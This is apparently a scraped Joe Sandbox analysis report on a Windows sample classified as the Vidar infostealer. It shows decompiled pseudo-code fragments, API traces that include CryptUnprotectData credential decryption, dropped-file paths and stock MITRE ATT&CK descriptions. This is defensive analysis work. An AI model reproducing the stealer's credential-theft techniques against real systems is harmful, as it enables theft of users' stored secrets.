				signed int _t26;
				signed int _t27;
				signed int _t29;
				signed int _t30;
				signed int* _t34;
				signed int _t36;
				void* _t39;
				signed int _t42;
				intOrPtr _t44;
				intOrPtr* _t45;
				intOrPtr* _t48;
				intOrPtr* _t49;
				void* _t54;
				void* _t55;

				_t39 = __ecx;
				_t42 = 0;
				if(_a12 <= 0) {
					L5:
					return _t22;
				} else {
					_t2 =  &_a12; // 0x435534
					_t48 = _t2;
					while(1) {
						_t48 = _t48 + 4;
						_t22 = E0042C007(_a4, _a8,  *_t48);
						_t54 = _t54 + 0xc;
						if(_t22 != 0) {
							break;
						}
						_t42 = _t42 + 1;
						if(_t42 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L38;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0042685C();
					asm("int3");
					_push(0);
					_push(_t48);
					_push(_t42);
					_t44 = _v32;
					_t38 = 0;
					E0041F6B0(_t44, 0, 0x90);
					_t49 = _v28;
					_t25 =  *_t49;
					_t55 = _t54 + 0xc;
					__eflags = _t25;
					if(_t25 != 0) {
						__eflags = _t25 - 0x2e;
						if(_t25 != 0x2e) {
							L15:
							_a4 = _t38;
							_t26 = E00422FD0(_t39, _t49, "_.,");
							__eflags = _t26 - _t38;
							while(1) {
								_pop(_t39);
								if(__eflags == 0) {
									break;
								}
								__eflags = _a4;
								_t45 = _t26 + _t49;
								_t38 =  *_t45;
								if(_a4 != 0) {
									__eflags = _a4 - 1;
									if(_a4 != 1) {
										__eflags = _a4 - 2;
										if(_a4 != 2) {
											break;
										} else {
											__eflags = _t26 - 0x10;
											if(_t26 >= 0x10) {
												break;
											} else {
												__eflags = _t38;
												if(_t38 == 0) {
													L28:
													_push(_t26);
													_push(_t49);
													_push(0x10);
													_t29 = _v0 - 0xffffff80;
													__eflags = _t29;
													goto L29;
												} else {
													__eflags = _t38 - 0x2c;
													if(_t38 != 0x2c) {
														break;
													} else {
														goto L28;
													}
												}
											}
										}
									} else {
										__eflags = _t26 - 0x40;
										if(_t26 >= 0x40) {
											break;
										} else {
											__eflags = _t38 - 0x5f;
											if(_t38 == 0x5f) {
												break;
											} else {
												_push(_t26);
												_push(_t49);
												_push(0x40);
												_t29 = _v0 + 0x40;
												L29:
												_push(_t29);
												goto L30;
											}
										}
									}
								} else {
									__eflags = _t26 - 0x40;
									if(_t26 >= 0x40) {
										break;
									} else {
										__eflags = _t38 - 0x2e;
										if(_t38 == 0x2e) {
											break;
										} else {
											_push(_t26);
											_push(_t49);
											_push(0x40);
											_push(_v0);
											L30:
											_t30 = E0042ACA8();
											_t55 = _t55 + 0x10;
											__eflags = _t30;
											if(_t30 != 0) {
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												goto L14;
											} else {
												__eflags = _t38 - 0x2c;
												if(_t38 == 0x2c) {
													goto L8;
												} else {
													__eflags = _t38;
													if(_t38 == 0) {
														goto L8;
													} else {
														_a4 = _a4 + 1;
														_t21 = _t45 + 1; // 0x1
														_t49 = _t21;
														_t26 = E00422FD0(_t39, _t49, "_.,");
														__eflags = _t26;
														continue;
													}
												}
											}
										}
									}
								}
								goto L36;
							}
							_t27 = _t26 | 0xffffffff;
							__eflags = _t27;
						} else {
							_t8 = _t49 + 1; // 0x1
							_t34 = _t8;
							__eflags =  *_t34;
							if( *_t34 == 0) {
								goto L15;
							} else {
								_t9 = _t44 + 0x80; // 0x80
								_t36 = E0042ACA8(_t9, 0x10, _t34, 0xf);
								_t55 = _t55 + 0x10;
								__eflags = _t36;
								if(_t36 != 0) {
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									L14:
									E0042685C();
									goto L15;
								} else {
									 *((char*)(_t44 + 0x8f)) = 0;
									goto L8;
								}
							}
						}
					} else {
						L8:
						_t27 = 0;
					}
					L36:
					return _t27;
				}
				L38:
			}

0x0042384c
0x00423855
0x0042385a
0x0042387e
0x00423881
0x0042385c
0x0042385d
0x0042385d
0x00423860
0x00423860
0x0042386b
0x00423870
0x00423875
0x00000000
0x00000000
0x00423877
0x0042387b
0x00000000
0x0042387d
0x00000000
0x0042387d
0x00000000
0x0042387b
0x00423882
0x00423883
0x00423884
0x00423885
0x00423886
0x00423887
0x0042388c
0x00423892
0x00423893
0x00423894
0x00423895
0x0042389d
0x004238a1
0x004238a6
0x004238a9
0x004238ab
0x004238ae
0x004238b0
0x004238b9
0x004238bb
0x004238ee
0x004238f4
0x004238f7
0x004238fc
0x00423990
0x00423991
0x00423992
0x00000000
0x00000000
0x00423903
0x00423907
0x0042390a
0x0042390c
0x00423925
0x00423929
0x00423941
0x00423945
0x00000000
0x00423947
0x00423947
0x0042394a
0x00000000
0x0042394c
0x0042394c
0x0042394e
0x00423955
0x00423955
0x00423959
0x0042395a
0x0042395c
0x0042395c
0x00000000
0x00423950
0x00423950
0x00423953
0x00000000
0x00000000
0x00000000
0x00000000
0x00423953
0x0042394e
0x0042394a
0x0042392b
0x0042392b
0x0042392e
0x00000000
0x00423930
0x00423930
0x00423933
0x00000000
0x00423935
0x00423935
0x00423939
0x0042393a
0x0042393c
0x0042395f
0x0042395f
0x00000000
0x0042395f
0x00423933
0x0042392e
0x0042390e
0x0042390e
0x00423911
0x00000000
0x00423917
0x00423917
0x0042391a
0x00000000
0x0042391c
0x0042391c
0x0042391d
0x0042391e
0x00423920
0x00423960
0x00423960
0x00423965
0x00423968
0x0042396a
0x004239a2
0x004239a3
0x004239a4
0x004239a5
0x004239a6
0x00000000
0x0042396c
0x0042396c
0x0042396f
0x00000000
0x00423975
0x00423975
0x00423977
0x00000000
0x0042397d
0x0042397d
0x00423980
0x00423980
0x00423989
0x0042398e
0x00000000
0x0042398e
0x00423977
0x0042396f
0x0042396a
0x0042391a
0x00423911
0x00000000
0x0042390c
0x00423998
0x00423998
0x004238bd
0x004238bd
0x004238bd
0x004238c0
0x004238c2
0x00000000
0x004238c4
0x004238c7
0x004238d0
0x004238d5
0x004238d8
0x004238da
0x004238e4
0x004238e5
0x004238e6
0x004238e7
0x004238e8
0x004238e9
0x004238e9
0x00000000
0x004238dc
0x004238dc
0x00000000
0x004238dc
0x004238da
0x004238c2
0x004238b2
0x004238b2
0x004238b2
0x004238b2
0x0042399b
0x0042399f
0x0042399f
0x00000000

APIs

_strcat_s.LIBCMT ref: 0042386B
__invoke_watson.LIBCMT ref: 00423887

Strings

4UC, xrefs: 0042385D, 00423863

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: __invoke_watson_strcat_s
String ID: 4UC
API String ID: 228796091-4097453413
Opcode ID: 95b1d28c9e240fa61c4ba4991dc21171899ec146138f27a4f7b1fc87340bbbaa
Instruction ID: 372096328524b51506cc31c38aeaacc55209b071a24fb0955f77f1119d260507
Opcode Fuzzy Hash: 95b1d28c9e240fa61c4ba4991dc21171899ec146138f27a4f7b1fc87340bbbaa
Instruction Fuzzy Hash: EBE09B7370011DABCB002D57EC4149B776EFF80369B42043AFD1855001C23AEA619694

Uniqueness

Uniqueness Score: -1.00%

Function 00415862 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00415862(intOrPtr __ecx, void* __esi, void* __eflags) {
				void* _t21;
				void* _t24;
				void* _t26;
				void* _t27;

				_push(4);
				E00423610(E004333B5, _t21, _t24, __esi);
				 *((intOrPtr*)(_t27 - 0x10)) = __ecx;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx - 0x68)) + 4)) + __ecx - 0x68)) = 0x43fde4;
				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
				_t26 = __ecx - 0x58;
				E004158A1(_t21, _t26, _t24, _t26,  *(_t27 - 4));
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t26 - 0x10)) + 4)) + _t26 - 0x10)) = 0x43fd9c;
				return E004236AF( *((intOrPtr*)( *((intOrPtr*)(_t26 - 0x10)) + 4)));
			}

0x00415862
0x00415869
0x0041586e
0x00415877
0x0041587f
0x00415883
0x00415888
0x00415893
0x004158a0

APIs

__EH_prolog3.LIBCMT ref: 00415869

Part of subcall function 004158A1: __EH_prolog3.LIBCMT ref: 004158A8

Strings

G_A, xrefs: 00415877
^A, xrefs: 00415893

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: H_prolog3
String ID: G_A$^A
API String ID: 431132790-2840445114
Opcode ID: c91811f154dce460b17843badd40e4383c2351fbc3b0cba45ff1d73f7e77ebce
Instruction ID: c791529906897547a7517a37bdeb0b7463a90a20267e68c061eb51409312fb97
Opcode Fuzzy Hash: c91811f154dce460b17843badd40e4383c2351fbc3b0cba45ff1d73f7e77ebce
Instruction Fuzzy Hash: 26E04FB8A00250CFDB20EF44C049A5CB7F4BF08309F41848EE9049B301CB789E08CB49

Uniqueness

Uniqueness Score: -1.00%

Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0040C670 __EH_prolog3_GS,_memset,lstrcat,lstrcat,lstrcat,CloseHandle,Sleep,OpenEventA,CreateEventA,_memset,lstrcat,lstrcat,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,Sleep,_memset,lstrcat,lstrcat,lstrcat,lstrcat,CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,_memset,CryptBinaryToStringA,CreateThread,CreateThread,Sleep,Sleep,_memset,_memset,	2_2_0040C670
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0040F7E5 CryptUnprotectData,LocalAlloc,_memmove,LocalFree,	2_2_0040F7E5
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0040FA24 _malloc,_memmove,_malloc,CryptUnprotectData,_memmove,	2_2_0040FA24
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0040F5CF _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcat,lstrcat,	2_2_0040F5CF
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0040F78C CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	2_2_0040F78C

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Vidar

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\10268862039712444505777708

C:\ProgramData\11565709257171813179063097

C:\ProgramData\48870274652683548820497570

C:\ProgramData\58308559385186415876143610

C:\ProgramData\82308976761520470245380715

C:\ProgramData\82668342394913559298137947

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Windows Analysis Report
file.exe

Function 00E82D4C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 3
COMMON

Function 00E8235E Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Function 00E812F0 Relevance: 1.5, APIs: 1, Instructions: 16
memoryCOMMON

Function 00E81370 Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Function 00E82110 Relevance: 1.3, APIs: 1, Instructions: 44
COMMON

Function 00E81730 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 93
COMMON

Function 00E82BB6 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73
COMMON

Function 00E82E39 Relevance: 6.0, APIs: 4, Instructions: 25
timethreadCOMMONLIBRARYCODE

Function 00E829D2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147
COMMON

Function 00E82610 Relevance: 12.1, APIs: 8, Instructions: 56
COMMON

Function 00E82D58 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31
COMMON

Function 00E82CD1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21
COMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre